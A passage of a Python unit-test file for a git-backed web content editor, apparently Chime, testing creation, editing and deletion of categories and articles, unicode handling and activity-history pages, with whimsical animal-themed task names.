# invokes view_functions/get_repo which creates a clone
task_description = u'vomit digestive fluid onto rotting flesh for flies'
working_branch = repo_functions.get_start_branch(self.clone1, 'master', task_description, fake_author_email)
self.assertTrue(working_branch.name in self.clone1.branches)
self.assertTrue(working_branch.name in self.origin.branches)
working_branch_name = working_branch.name
working_branch.checkout()
# create a categories directory
categories_slug = u'categories'
response = self.test_client.post('/tree/{}/edit/'.format(working_branch_name),
data={'action': 'create', 'create_what': constants.CATEGORY_LAYOUT, 'request_path': categories_slug},
follow_redirects=True)
# and put a new category inside it
cata_title = u'Mouth Parts'
cata_slug = slugify(cata_title)
response = self.test_client.post('/tree/{}/edit/{}'.format(working_branch_name, categories_slug),
data={'action': 'create', 'create_what': constants.CATEGORY_LAYOUT, 'request_path': cata_title},
follow_redirects=True)
self.assertEqual(response.status_code, 200)
# put another cateogry inside that
catb_title = u'Esophagus'
catb_slug = slugify(catb_title)
response = self.test_client.post('/tree/{}/edit/{}'.format(working_branch_name, join(categories_slug, cata_slug)),
data={'action': 'create', 'create_what': constants.CATEGORY_LAYOUT, 'request_path': catb_title},
follow_redirects=True)
self.assertEqual(response.status_code, 200)
# and an article inside that
art_title = u'Stomach'
art_slug = slugify(art_title)
response = self.test_client.post('/tree/{}/edit/{}'.format(working_branch_name, join(categories_slug, cata_slug, catb_slug)),
data={'action': 'create', 'create_what': constants.ARTICLE_LAYOUT, 'request_path': art_title},
follow_redirects=True)
self.assertEqual(response.status_code, 200)
# pull the changes
self.clone1.git.pull('origin', working_branch_name)
# verify that the categories and article exist
art_location = join(self.clone1.working_dir, categories_slug, cata_slug, catb_slug, art_slug)
catb_location = join(self.clone1.working_dir, categories_slug, cata_slug, catb_slug)
cata_location = join(self.clone1.working_dir, categories_slug, cata_slug)
self.assertTrue(exists(art_location))
self.assertTrue(view_functions.is_article_dir(art_location))
# delete category a
response = self.test_client.post('/tree/{}/edit/{}'.format(working_branch_name, join(categories_slug, cata_slug)),
data={'action': 'delete_category'},
follow_redirects=True)
self.assertEqual(response.status_code, 200)
# pull the changes
self.clone1.git.pull('origin', working_branch_name)
# verify that the deleted category and article no longer exist
self.assertFalse(exists(art_location))
self.assertFalse(exists(catb_location))
self.assertFalse(exists(cata_location))
# in TestApp
def test_delete_commit_accuracy(self):
''' The record of a delete in the corresponding commit is accurate.
'''
with HTTMock(self.auth_csv_example_allowed):
erica_email = u'erica@example.com'
with HTTMock(self.mock_persona_verify_erica):
erica = ChimeTestClient(self.test_client, self)
erica.sign_in(email=erica_email)
# Start a new task
erica.open_link(constants.ROUTE_ACTIVITY)
erica.start_task(description=u'Ferment Tuber Fibres Using Symbiotic Bacteria in the Intestines for Naked Mole Rats')
# Get the branch name
branch_name = erica.get_branch_name()
# Enter the "other" folder
erica.follow_link(href='/tree/{}/edit/other/'.format(branch_name))
# Create a category and fill it with some subcategories and articles
category_names = [u'Indigestible Cellulose']
subcategory_names = [u'Volatile Fatty Acids', u'Non-Reproducing Females', u'Arid African Deserts']
article_names = [u'Eusocial Exhibition', u'Old Enough to Eat Solid Food', u'Contributing to Extension of Tunnels', u'Foraging and Nest Building']
erica.add_category(category_name=category_names[0])
category_path = erica.path
erica.add_subcategory(subcategory_name=subcategory_names[0])
erica.open_link(category_path)
erica.add_subcategory(subcategory_name=subcategory_names[1])
erica.open_link(category_path)
erica.add_subcategory(subcategory_name=subcategory_names[2])
subcategory_path = erica.path
erica.add_article(article_name=article_names[0])
erica.open_link(subcategory_path)
erica.add_article(article_name=article_names[1])
erica.open_link(subcategory_path)
erica.add_article(article_name=article_names[2])
erica.open_link(subcategory_path)
erica.add_article(article_name=article_names[3])
# Delete the all-containing category
erica.open_link(category_path)
erica.follow_modify_category_link(category_names[0])
erica.delete_category()
# get and check the history
repo = view_functions.get_repo(repo_path=self.app.config['REPO_PATH'], work_path=self.app.config['WORK_PATH'], email='erica@example.com')
activity = chime_activity.ChimeActivity(repo=repo, branch_name=branch_name, default_branch_name='master', actor_email=erica_email)
activity_history = activity.history
delete_history = activity_history[0]['actions']
for item in delete_history:
self.assertEqual(item['action'], u'delete')
if item['title'] in category_names:
self.assertEqual(item['display_type'], constants.CATEGORY_LAYOUT)
category_names.remove(item['title'])
elif item['title'] in subcategory_names:
self.assertEqual(item['display_type'], constants.CATEGORY_LAYOUT)
subcategory_names.remove(item['title'])
elif item['title'] in article_names:
self.assertEqual(item['display_type'], constants.ARTICLE_LAYOUT)
article_names.remove(item['title'])
# we should have fewer category, subcategory, and article names
self.assertEqual(len(category_names), 0)
self.assertEqual(len(subcategory_names), 0)
self.assertEqual(len(article_names), 0)
# in TestApp
def test_delete_article(self):
''' An article can be deleted
'''
fake_author_email = u'erica@example.com'
with HTTMock(self.mock_persona_verify_erica):
self.test_client.post('/sign-in', data={'assertion': fake_author_email})
with HTTMock(self.auth_csv_example_allowed):
# start a new branch via the http interface
# invokes view_functions/get_repo which creates a clone
task_description = u'Remove Small Organic Particles From Seawater Passing Over Outspread Tentacles for Sea Anemones'
working_branch = repo_functions.get_start_branch(self.clone1, 'master', task_description, fake_author_email)
self.assertTrue(working_branch.name in self.clone1.branches)
self.assertTrue(working_branch.name in self.origin.branches)
working_branch_name = working_branch.name
working_branch.checkout()
# create an article
art_title = u'Zooplankters'
art_slug = slugify(art_title)
response = self.test_client.post('/tree/{}/edit/'.format(working_branch_name),
data={'action': 'create', 'create_what': constants.ARTICLE_LAYOUT, 'request_path': art_title},
follow_redirects=True)
self.assertEqual(response.status_code, 200)
# pull the changes
self.clone1.git.pull('origin', working_branch_name)
# verify that the article exists
art_location = join(self.clone1.working_dir, art_slug)
self.assertTrue(exists(art_location))
self.assertTrue(view_functions.is_article_dir(art_location))
# delete the article
response = self.test_client.post('/tree/{}/edit/{}'.format(working_branch_name, art_slug),
data={'action': 'delete_article', 'request_path': art_slug},
follow_redirects=True)
self.assertEqual(response.status_code, 200)
# pull the changes
self.clone1.git.pull('origin', working_branch_name)
# verify that the deleted category and article no longer exist
self.assertFalse(exists(art_location))
# in TestApp
def test_article_creation_with_unicode_via_web_interface(self):
''' An article with unicode in its title is created as expected.
'''
fake_author_email = u'erica@example.com'
with HTTMock(self.mock_persona_verify_erica):
self.test_client.post('/sign-in', data={'assertion': fake_author_email})
with HTTMock(self.auth_csv_example_allowed):
# start a new branch via the http interface
# invokes view_functions/get_repo which creates a clone
task_description = u'eviscerate a salmon for baby grizzly bears'
working_branch = repo_functions.get_start_branch(self.clone1, 'master', task_description, fake_author_email)
self.assertTrue(working_branch.name in self.clone1.branches)
self.assertTrue(working_branch.name in self.origin.branches)
working_branch_name = working_branch.name
working_branch.checkout()
# create a new article
art_title = u'快速狐狸'
art_slug = slugify(art_title)
response = self.test_client.post('/tree/{}/edit/'.format(working_branch_name), data={'action': 'create', 'create_what': constants.ARTICLE_LAYOUT, 'request_path': art_title}, follow_redirects=True)
self.assertEqual(response.status_code, 200)
self.assertTrue(PATTERN_TEMPLATE_COMMENT.format(u'article-edit') in response.data.decode('utf-8'))
# pull the changes
self.clone1.git.pull('origin', working_branch_name)
# a directory was created
dir_location = join(self.clone1.working_dir, art_slug)
idx_location = u'{}/index.{}'.format(dir_location, constants.CONTENT_FILE_EXTENSION)
self.assertTrue(exists(dir_location) and isdir(dir_location))
# an index page was created inside
self.assertTrue(exists(idx_location))
# the directory and index page pass the article test
self.assertTrue(view_functions.is_article_dir(dir_location))
# the title saved in the index front matter is the same text that was used to create the article
self.assertEqual(view_functions.get_value_from_front_matter('title', idx_location), art_title)
# the title saved in the index front matter is displayed on the article list page
response = self.test_client.get('/tree/{}/edit/'.format(working_branch_name), follow_redirects=True)
self.assertEqual(response.status_code, 200)
self.assertTrue(PATTERN_TEMPLATE_COMMENT.format(u'articles-list') in response.data.decode('utf-8'))
self.assertTrue(PATTERN_BRANCH_COMMENT.format(working_branch) in response.data.decode('utf-8'))
self.assertTrue(PATTERN_FILE_COMMENT.format(**{"file_name": art_slug, "file_title": art_title, "file_type": constants.ARTICLE_LAYOUT}) in response.data.decode('utf-8'))
# in TestApp
def test_save_non_roman_characters_to_article(self):
''' Adding non-roman characters to an article's title and body raises no unicode errors.
'''
with HTTMock(self.auth_csv_example_allowed):
with HTTMock(self.mock_persona_verify_erica):
erica = ChimeTestClient(self.app.test_client(), self)
erica.sign_in('erica@example.com')
# Start a new task, topic, subtopic, article
erica.open_link(constants.ROUTE_ACTIVITY)
args = 'Mermithergate for Ant Worker', 'Enoplia Nematode', 'Genus Mermis', 'Cephalotes Atratus'
erica.quick_activity_setup(*args)
# Edit the new article and give it a non-roman character title
erica.edit_article(u'快速狐狸', u'Myrmeconema ੯ूᵕू ໒꒱ƶƵ Neotropicum')
# in TestApp
def test_sign_in_with_email_containing_non_roman_characters(self):
''' Adding non-roman characters to the sign-in email raises no errors.
'''
with HTTMock(self.auth_csv_example_allowed):
with HTTMock(self.mock_persona_verify_non_roman):
erica = ChimeTestClient(self.app.test_client(), self)
erica.sign_in('੯ूᵕू ໒꒱ƶƵ@快速狐狸.com')
# in TestApp
def test_new_item_has_name_and_title(self):
''' A slugified directory name and display title are created when a new category or article is created.
'''
fake_author_email = u'erica@example.com'
with HTTMock(self.mock_persona_verify_erica):
self.test_client.post('/sign-in', data={'assertion': fake_author_email})
with HTTMock(self.auth_csv_example_allowed):
# start a new branch via the http interface
# invokes view_functions/get_repo which creates a clone
task_description = u'eviscerate a salmon for baby grizzly bears'
working_branch = repo_functions.get_start_branch(self.clone1, 'master', task_description, fake_author_email)
self.assertTrue(working_branch.name in self.clone1.branches)
self.assertTrue(working_branch.name in self.origin.branches)
working_branch_name = working_branch.name
working_branch.checkout()
# create a new category
cat_title = u'grrowl!! Yeah'
cat_slug = slugify(cat_title)
response = self.test_client.post('/tree/{}/edit/'.format(working_branch_name),
data={'action': 'create', 'create_what': constants.CATEGORY_LAYOUT, 'request_path': cat_title},
follow_redirects=True)
self.assertEqual(response.status_code, 200)
# pull the changes
self.clone1.git.pull('origin', working_branch_name)
# a directory was created
dir_location = join(self.clone1.working_dir, cat_slug)
idx_location = u'{}/index.{}'.format(dir_location, constants.CONTENT_FILE_EXTENSION)
self.assertTrue(exists(dir_location) and isdir(dir_location))
# an index page was created inside
self.assertTrue(exists(idx_location))
# the directory and index page pass the category test
self.assertTrue(view_functions.is_category_dir(dir_location))
# the title saved in the index front matter is the same text that was used to create the category
self.assertEqual(view_functions.get_value_from_front_matter('title', idx_location), cat_title)
# the title saved in the index front matter is displayed on the article list page
response = self.test_client.get('/tree/{}/edit/'.format(working_branch_name), follow_redirects=True)
self.assertTrue(PATTERN_FILE_COMMENT.format(**{"file_name": cat_slug, "file_title": cat_title, "file_type": constants.CATEGORY_LAYOUT}) in response.data)
# create a new article
art_title = u'快速狐狸'
art_slug = slugify(art_title)
response = self.test_client.post('/tree/{}/edit/'.format(working_branch_name), data={'action': 'create', 'create_what': constants.ARTICLE_LAYOUT, 'request_path': art_title}, follow_redirects=True)
self.assertEqual(response.status_code, 200)
self.assertTrue(PATTERN_TEMPLATE_COMMENT.format(u'article-edit') in response.data.decode('utf-8'))
# pull the changes
self.clone1.git.pull('origin', working_branch_name)
# a directory was created
dir_location = join(self.clone1.working_dir, art_slug)
idx_location = u'{}/index.{}'.format(dir_location, constants.CONTENT_FILE_EXTENSION)
self.assertTrue(exists(dir_location) and isdir(dir_location))
# an index page was created inside
self.assertTrue(exists(idx_location))
# the directory and index page pass the article test
self.assertTrue(view_functions.is_article_dir(dir_location))
# the title saved in the index front matter is the same text that was used to create the article
self.assertEqual(view_functions.get_value_from_front_matter('title', idx_location), art_title)
# the title saved in the index front matter is displayed on the article list page
response = self.test_client.get('/tree/{}/edit/'.format(working_branch_name), follow_redirects=True)
self.assertEqual(response.status_code, 200)
self.assertTrue(PATTERN_TEMPLATE_COMMENT.format(u'articles-list') in response.data.decode('utf-8'))
self.assertTrue(PATTERN_BRANCH_COMMENT.format(working_branch) in response.data.decode('utf-8'))
self.assertTrue(PATTERN_FILE_COMMENT.format(**{"file_name": art_slug, "file_title": art_title, "file_type": constants.ARTICLE_LAYOUT}) in response.data.decode('utf-8'))
# in TestApp
def test_edit_category_title_and_description(self):
''' A category's title and description can be edited.
'''
fake_author_email = u'erica@example.com'
with HTTMock(self.mock_persona_verify_erica):
self.test_client.post('/sign-in', data={'assertion': fake_author_email})
with HTTMock(self.auth_csv_example_allowed):
# start a new branch via the http interface
# invokes view_functions/get_repo which creates a clone
task_description = u'rapidly discharge black ink into the mantle cavity for squids'
working_branch = repo_functions.get_start_branch(self.clone1, 'master', task_description, fake_author_email)
self.assertTrue(working_branch.name in self.clone1.branches)
self.assertTrue(working_branch.name in self.origin.branches)
working_branch_name = working_branch.name
working_branch.checkout()
# create a categories directory
categories_slug = u'categories'
response = self.test_client.post('/tree/{}/edit/'.format(working_branch_name),
data={'action': 'create', 'create_what': constants.CATEGORY_LAYOUT, 'request_path': categories_slug},
follow_redirects=True)
# and put a new category inside it
cat_title = u'Bolus'
cat_slug = slugify(cat_title)
response = self.test_client.post('/tree/{}/edit/{}'.format(working_branch_name, categories_slug),
data={'action': 'create', 'create_what': constants.CATEGORY_LAYOUT, 'request_path': cat_title},
follow_redirects=True)
self.assertEqual(response.status_code, 200)
# pull the changes
self.clone1.git.pull('origin', working_branch_name)
# get the hexsha
hexsha = self.clone1.commit().hexsha
# get the modify page and verify that the form renders with the correct values
cat_path = join(categories_slug, cat_slug, u'index.{}'.format(constants.CONTENT_FILE_EXTENSION))
response = self.test_client.get('/tree/{}/edit/{}'.format(working_branch_name, cat_path), follow_redirects=True)
self.assertEqual(response.status_code, 200)
self.assertTrue(PATTERN_FORM_CATEGORY_TITLE.format(title=cat_title) in response.data)
self.assertTrue(PATTERN_FORM_CATEGORY_DESCRIPTION.format(description=u'') in response.data)
# now save a new title and description for the category
new_cat_title = u'Caecum'
cat_description = u'An intraperitoneal pouch, that is considered to be the beginning of the large intestine.'
response = self.test_client.post('/tree/{}/edit/{}'.format(working_branch_name, cat_path),
data={'layout': constants.CATEGORY_LAYOUT, 'hexsha': hexsha, 'url-slug': u'{}/{}/'.format(categories_slug, cat_slug),
'en-title': new_cat_title, 'en-description': cat_description, 'order': u'0', 'action': u'save_category'},
follow_redirects=True)
self.assertEqual(response.status_code, 200)
# check the returned HTML for the description and title values (format will change as pages are designed)
response_data = sub(''', '\'', response.data.decode('utf-8'))
self.assertTrue(PATTERN_FLASH_SAVED_CATEGORY.format(title=new_cat_title) in response_data)
self.assertTrue(PATTERN_FORM_CATEGORY_DESCRIPTION.format(description=cat_description) in response_data)
self.assertTrue(PATTERN_FORM_CATEGORY_TITLE.format(title=new_cat_title) in response_data)
# pull the changes
self.clone1.git.pull('origin', working_branch_name)
# a directory was created
dir_location = join(self.clone1.working_dir, categories_slug, cat_slug)
idx_location = u'{}/index.{}'.format(dir_location, constants.CONTENT_FILE_EXTENSION)
self.assertTrue(exists(dir_location) and isdir(dir_location))
# an index page was created inside
self.assertTrue(exists(idx_location))
# the directory and index page pass the category test
self.assertTrue(view_functions.is_category_dir(dir_location))
# the title and description saved in the index front matter is the same text that was used to create the category
self.assertEqual(view_functions.get_value_from_front_matter('title', idx_location), new_cat_title)
self.assertEqual(view_functions.get_value_from_front_matter('description', idx_location), cat_description)
# the title saved in the index front matter is displayed on the article list page
response = self.test_client.get('/tree/{}/edit/{}'.format(working_branch_name, categories_slug), follow_redirects=True)
self.assertTrue(PATTERN_FILE_COMMENT.format(**{"file_name": cat_slug, "file_title": new_cat_title, "file_type": constants.CATEGORY_LAYOUT}) in response.data)
# in TestApp
def test_delete_category(self):
''' A category can be deleted
'''
fake_author_email = u'erica@example.com'
with HTTMock(self.mock_persona_verify_erica):
self.test_client.post('/sign-in', data={'assertion': fake_author_email})
with HTTMock(self.auth_csv_example_allowed):
# start a new branch via the http interface
# invokes view_functions/get_repo which creates a clone
task_description = u'clasp with front legs and draw up the hind end for geometridae'
working_branch = repo_functions.get_start_branch(self.clone1, 'master', task_description, fake_author_email)
self.assertTrue(working_branch.name in self.clone1.branches)
self.assertTrue(working_branch.name in self.origin.branches)
working_branch_name = working_branch.name
working_branch.checkout()
# create a categories directory
categories_slug = u'categories'
response = self.test_client.post('/tree/{}/edit/'.format(working_branch_name),
data={'action': 'create', 'create_what': constants.CATEGORY_LAYOUT, 'request_path': categories_slug},
follow_redirects=True)
# and put a new category inside it
cat_title = u'Soybean Looper'
cat_slug = slugify(cat_title)
response = self.test_client.post('/tree/{}/edit/{}'.format(working_branch_name, categories_slug),
data={'action': 'create', 'create_what': constants.CATEGORY_LAYOUT, 'request_path': cat_title},
follow_redirects=True)
self.assertEqual(response.status_code, 200)
# pull the changes
self.clone1.git.pull('origin', working_branch_name)
# get the hexsha
hexsha = self.clone1.commit().hexsha
# now delete the category
cat_description = u''
url_slug = u'{}/{}/'.format(categories_slug, cat_slug)
response = self.test_client.post('/tree/{}/edit/{}'.format(working_branch_name, url_slug.rstrip('/')),
data={'layout': constants.CATEGORY_LAYOUT, 'hexsha': hexsha, 'url-slug': url_slug,
'en-title': cat_title, 'en-description': cat_description, 'order': u'0',
'action': u'delete_category'},
follow_redirects=True)
self.assertEqual(response.status_code, 200)
# check the returned HTML for the description and title values (format will change as pages are designed)
soup = BeautifulSoup(response.data)
self.assertEqual(PATTERN_FLASH_DELETED_CATEGORY.format(title=cat_title, containing=u''), soup.find('li', class_='flash').text)
# pull the changes
self.clone1.git.pull('origin', working_branch_name)
# the directory was deleted
dir_location = join(self.clone1.working_dir, categories_slug, cat_slug)
self.assertFalse(exists(dir_location) and isdir(dir_location))
# the title is not displayed on the article list page
response = self.test_client.get('/tree/{}/edit/{}'.format(working_branch_name, categories_slug), follow_redirects=True)
self.assertFalse(PATTERN_FILE_COMMENT.format(file_name=cat_slug, file_title=cat_title, file_type=constants.CATEGORY_LAYOUT) in response.data)
# in TestApp
def test_set_and_retrieve_order_and_description(self):
''' Order and description can be set to and retrieved from an article's or category's front matter.
'''
fake_author_email = u'erica@example.com'
with HTTMock(self.mock_persona_verify_erica):
self.test_client.post('/sign-in', data={'assertion': fake_author_email})
with HTTMock(self.auth_csv_example_allowed):
# start a new branch via the http interface
# invokes view_functions/get_repo which creates a clone
task_description = u'regurgitate partially digested worms and grubs for baby birds'
working_branch = repo_functions.get_start_branch(self.clone1, 'master', task_description, fake_author_email)
self.assertTrue(working_branch.name in self.clone1.branches)
self.assertTrue(working_branch.name in self.origin.branches)
working_branch_name = working_branch.name
working_branch.checkout()
# create a categories directory
categories_slug = u'categories'
response = self.test_client.post('/tree/{}/edit/'.format(working_branch_name),
data={'action': 'create', 'create_what': constants.CATEGORY_LAYOUT, 'request_path': categories_slug},
follow_redirects=True)
# and put a new category inside it
cat_title = u'Small Intestine'
cat_slug = slugify(cat_title)
response = self.test_client.post('/tree/{}/edit/{}'.format(working_branch_name, categories_slug),
data={'action': 'create', 'create_what': constants.CATEGORY_LAYOUT, 'request_path': cat_title},
follow_redirects=True)
self.assertEqual(response.status_code, 200)
# pull the changes
self.clone1.git.pull('origin', working_branch_name)
# get the hexsha
hexsha = self.clone1.commit().hexsha
# now save some values into the category's index page's front matter
new_cat_title = u'The Small Intestine'
cat_description = u'The part of the GI tract following the stomach and followed by the large intestine where much of the digestion and absorption of food takes place.'
cat_order = 3
cat_path = join(categories_slug, cat_slug, u'index.{}'.format(constants.CONTENT_FILE_EXTENSION))
response = self.test_client.post('/tree/{}/edit/{}'.format(working_branch_name, cat_path),
data={'layout': constants.CATEGORY_LAYOUT, 'hexsha': hexsha,
'en-title': new_cat_title, 'en-description': cat_description,
'order': cat_order, 'action': u'save_category'},
follow_redirects=True)
self.assertEqual(response.status_code, 200)
# check the returned HTML for the description and order values (format will change as pages are designed)
soup = BeautifulSoup(response.data)
self.assertEqual(soup.find('textarea', {'name': 'en-description'}).text, cat_description)
self.assertEqual(int(soup.find('input', {'name': 'order'})['value']), cat_order)
# pull the changes
self.clone1.git.pull('origin', working_branch_name)
# a directory was created
dir_location = join(self.clone1.working_dir, categories_slug, cat_slug)
idx_location = u'{}/index.{}'.format(dir_location, constants.CONTENT_FILE_EXTENSION)
self.assertTrue(exists(dir_location) and isdir(dir_location))
# an index page was created inside
self.assertTrue(exists(idx_location))
# the directory and index page pass the category test
self.assertTrue(view_functions.is_category_dir(dir_location))
# the title saved in the index front matter is the same text that was used to create the category
self.assertEqual(view_functions.get_value_from_front_matter('title', idx_location), new_cat_title)
# check order and description
self.assertEqual(view_functions.get_value_from_front_matter('order', idx_location), cat_order)
self.assertEqual(view_functions.get_value_from_front_matter('description', idx_location), cat_description)
# the title saved in the index front matter is displayed on the article list page
response = self.test_client.get('/tree/{}/edit/{}'.format(working_branch_name, categories_slug), follow_redirects=True)
self.assertTrue(PATTERN_FILE_COMMENT.format(**{"file_name": cat_slug, "file_title": new_cat_title, "file_type": constants.CATEGORY_LAYOUT}) in response.data)
# in TestApp
def test_column_navigation_structure(self):
''' The column navigation structure matches the structure of the site.
'''
fake_author_email = u'erica@example.com'
with HTTMock(self.mock_persona_verify_erica):
self.test_client.post('/sign-in', data={'assertion': fake_author_email})
with HTTMock(self.auth_csv_example_allowed):
# start a new branch via the http interface
# invokes view_functions/get_repo which creates a clone
task_description = u'force a clam shell open for starfish'
working_branch = repo_functions.get_start_branch(self.clone1, 'master', task_description, fake_author_email)
self.assertTrue(working_branch.name in self.clone1.branches)
self.assertTrue(working_branch.name in self.origin.branches)
working_branch_name = working_branch.name
working_branch.checkout()
# create some nested categories
slug_hello = u'hello'
response = self.test_client.post('/tree/{}/edit/'.format(working_branch_name),
data={'action': 'create', 'create_what': constants.CATEGORY_LAYOUT, 'request_path': slug_hello},
follow_redirects=True)
self.assertEqual(response.status_code, 200)
slug_world = u'world'
response = self.test_client.post('/tree/{}/edit/{}'.format(working_branch_name, slug_hello),
data={'action': 'create', 'create_what': constants.CATEGORY_LAYOUT, 'request_path': slug_world},
follow_redirects=True)
self.assertEqual(response.status_code, 200)
slug_how = u'how'
response = self.test_client.post('/tree/{}/edit/{}'.format(working_branch_name, sep.join([slug_hello, slug_world])),
data={'action': 'create', 'create_what': constants.CATEGORY_LAYOUT, 'request_path': slug_how},
follow_redirects=True)
self.assertEqual(response.status_code, 200)
slug_are = u'are'
response = self.test_client.post('/tree/{}/edit/{}'.format(working_branch_name, sep.join([slug_hello, slug_world, slug_how])),
data={'action': 'create', 'create_what': constants.CATEGORY_LAYOUT, 'request_path': slug_are},
follow_redirects=True)
self.assertEqual(response.status_code, 200)
# pull the changes
self.clone1.git.pull('origin', working_branch_name)
# get the columns
dir_columns = view_functions.make_directory_columns(self.clone1, working_branch_name, sep.join([slug_hello, slug_world, slug_how, slug_are]))
# test that the contents match our expectations
self.assertEqual(len(dir_columns), 4)
self.assertEqual(len(dir_columns[0]['files']), 7)
expected = {'hello': u'category', 'img': u'folder', 'index.md': u'file', 'other': u'folder', 'other.md': u'file', 'sub': u'folder', 'test-articles': u'folder'}
for item in dir_columns[0]['files']:
self.assertTrue(item['name'] in expected)
self.assertTrue(expected[item['name']] == item['display_type'])
self.assertTrue(dir_columns[1]['files'][0]['name'] == slug_world)
self.assertTrue(dir_columns[2]['files'][0]['name'] == slug_how)
self.assertTrue(dir_columns[3]['files'][0]['name'] == slug_are)
# in TestApp
def test_activity_overview_page_is_accurate(self):
''' The activity history page accurately displays the activity history
'''
fake_author_email = u'erica@example.com'
with HTTMock(self.mock_persona_verify_erica):
self.test_client.post('/sign-in', data={'assertion': fake_author_email})
with HTTMock(self.auth_csv_example_allowed):
# start a new branch via the http interface
# invokes view_functions/get_repo which creates a clone
task_description = u'deposit eggs in a syconium for fig wasp larvae'
working_branch = repo_functions.get_start_branch(self.clone1, 'master', task_description, fake_author_email)
self.assertTrue(working_branch.name in self.clone1.branches)
self.assertTrue(working_branch.name in self.origin.branches)
working_branch_name = working_branch.name
working_branch.checkout()
title_fig_zh = u'无花果'
slug_fig_zh = u'wu-hua-guo'
title_syconium = u'Syconium'
slug_syconium = u'syconium'
title_ostiole = u'Ostiole'
title_fig_en = u'Fig'
title_fig_bn = u'Dumur'
create_details = [
(u'', title_fig_zh, constants.CATEGORY_LAYOUT),
(slug_fig_zh, title_syconium, constants.CATEGORY_LAYOUT),
(u'{}/{}'.format(slug_fig_zh, slug_syconium), title_ostiole, constants.ARTICLE_LAYOUT),
(u'', title_fig_en, constants.CATEGORY_LAYOUT),
(u'', title_fig_bn, constants.CATEGORY_LAYOUT)
]
for detail in create_details:
response = self.test_client.post('/tree/{}/edit/{}'.format(working_branch_name, detail[0]),
data={'action': 'create', 'create_what': detail[2], 'request_path': detail[1]},
follow_redirects=True)
self.assertEqual(response.status_code, 200)
# add a comment
comment_text = u'The flowers provide a safe haven and nourishment for the next generation of wasps. ᙙᙖ'
response = self.test_client.post('/tree/{}/'.format(working_branch_name),
data={'comment': 'Comment', 'comment_text': comment_text},
follow_redirects=True)
self.assertEqual(response.status_code, 200)
# delete a topic
response = self.test_client.post('/tree/{}/edit/{}'.format(working_branch_name, slug_fig_zh),
data={'action': 'delete_category'},
follow_redirects=True)
self.assertEqual(response.status_code, 200)
# get the activity history page
response = self.test_client.get('/tree/{}/'.format(working_branch_name), follow_redirects=True)
# TODO: for some reason (encoding?) my double-quotes are being replaced by " in the returned HTML
response_data = sub('"', '"', response.data.decode('utf-8'))
# make sure everything we did above is shown on the activity page
self.assertTrue(PATTERN_TEMPLATE_COMMENT.format('activity-overview') in response_data)
self.assertTrue(PATTERN_OVERVIEW_ACTIVITY_STARTED.format(activity_name=task_description, author_email=fake_author_email) in response_data)
self.assertTrue(PATTERN_OVERVIEW_COMMENT_BODY.format(comment_body=comment_text) in response_data)
self.assertTrue(PATTERN_OVERVIEW_ITEM_DELETED.format(deleted_name=title_fig_zh, deleted_type=view_functions.file_display_name(constants.CATEGORY_LAYOUT), deleted_also=u'(containing 1 topic and 1 article) ', author_email=fake_author_email) in response_data)
for detail in create_details:
self.assertTrue(PATTERN_OVERVIEW_ITEM_CREATED.format(created_name=detail[1], created_type=detail[2], author_email=fake_author_email), response_data)
# in TestApp
def test_activity_history_summary_accuracy(self):
''' The summary of an activity's history is displayed as expected.
'''
with HTTMock(self.auth_csv_example_allowed):
with HTTMock(self.mock_persona_verify_erica):
erica = ChimeTestClient(self.test_client, self)
erica.sign_in(email='erica@example.com')
# Start a new task
erica.open_link(constants.ROUTE_ACTIVITY)
erica.start_task(description=u'Parasitize with Ichneumonidae for Moth Larvae')
# Get the branch name
branch_name = erica.get_branch_name()
# Load the "other" folder
erica.open_link(url='/tree/{}/edit/other/'.format(branch_name))
# Create a category, sub-category, article
category_name = u'Antennae Segments'
subcategory_name = u'Short Ovipositors'
article_names = [u'Inject Eggs Directly Into a Host Body', u'A Technique Of Celestial Navigation Called Transverse Orientation']
erica.add_category(category_name=category_name)
erica.add_subcategory(subcategory_name=subcategory_name)
subcategory_path = erica.path
erica.add_article(article_name=article_names[0])
# edit the article
erica.edit_article(title_str=article_names[0], body_str=u'Inject venom along with the egg')
# create another article and delete it
erica.open_link(subcategory_path)
erica.add_article(article_name=article_names[1])
erica.open_link(subcategory_path)
erica.delete_article(article_names[1])
# Load the activity overview page
erica.open_link(url='/tree/{}/'.format(branch_name))
# there is a summary
summary_div = erica.soup.find("div", {"data-test-id": "summary-div"})
self.assertIsNotNone(summary_div)
# it's right about what's changed
self.assertIsNotNone(summary_div.find(lambda tag: bool(tag.name == 'p' and '2 articles and 2 topics' in tag.text)))
# grab all the list items
check_rows = summary_div.find_all('li')
# the link to create a new change
change_row = check_rows.pop()
self.assertIsNotNone(change_row.find("a", {"data-test-id": "change-link"}))
self.assertEqual(change_row.find("a", {"data-test-id": "change-link"}).text, constants.TEXT_ADD_CHANGE)
# make sure the list items match what we did above
category_row = check_rows.pop()
self.assertIsNotNone(category_row.find("a", {"data-test-id": "change-link"}))
self.assertEqual(category_row.find('h3', {"data-test-id": "change-title"}).text, category_name)
self.assertEqual(category_row.find('div', {"data-test-id": "change-display-type"}).text, constants.LAYOUT_DISPLAY_LOOKUP[constants.CATEGORY_LAYOUT].title())
self.assertEqual(category_row.find('p', {"data-test-id": "change-actions"}).text, u'Created')
subcategory_row = check_rows.pop()
self.assertIsNotNone(subcategory_row.find("a", {"data-test-id": "change-link"}))
self.assertEqual(subcategory_row.find('h3', {"data-test-id": "change-title"}).text, subcategory_name)
self.assertEqual(subcategory_row.find('div', {"data-test-id": "change-display-type"}).text, constants.LAYOUT_DISPLAY_LOOKUP[constants.CATEGORY_LAYOUT].title())
self.assertEqual(subcategory_row.find('p', {"data-test-id": "change-actions"}).text, u'Created')
article_1_row = check_rows.pop()
self.assertIsNotNone(article_1_row.find("a", {"data-test-id": "change-link"}))
self.assertEqual(article_1_row.find('h3', {"data-test-id": "change-title"}).text, article_names[0])
self.assertEqual(article_1_row.find('div', {"data-test-id": "change-display-type"}).text, constants.LAYOUT_DISPLAY_LOOKUP[constants.ARTICLE_LAYOUT].title())
self.assertEqual(article_1_row.find('p', {"data-test-id": "change-actions"}).text, u'Created, Edited')
article_2_row = check_rows.pop()
self.assertIsNone(article_2_row.find("a", {"data-test-id": "change-link"}))
self.assertIsNone(article_2_row.find('h3', {"data-test-id": "change-title"}).find('a'))
self.assertEqual(article_2_row.find('h3', {"data-test-id": "change-title"}).text, article_names[1])
self.assertEqual(article_2_row.find('div', {"data-test-id": "change-display-type"}).text, constants.LAYOUT_DISPLAY_LOOKUP[constants.ARTICLE_LAYOUT].title())
self.assertEqual(article_2_row.find('p', {"data-test-id": "change-actions"}).text, u'Created, Deleted')
# no rows left
self.assertEqual(len(check_rows), 0)
# in TestApp
def test_create_page_creates_directory_containing_index(self):
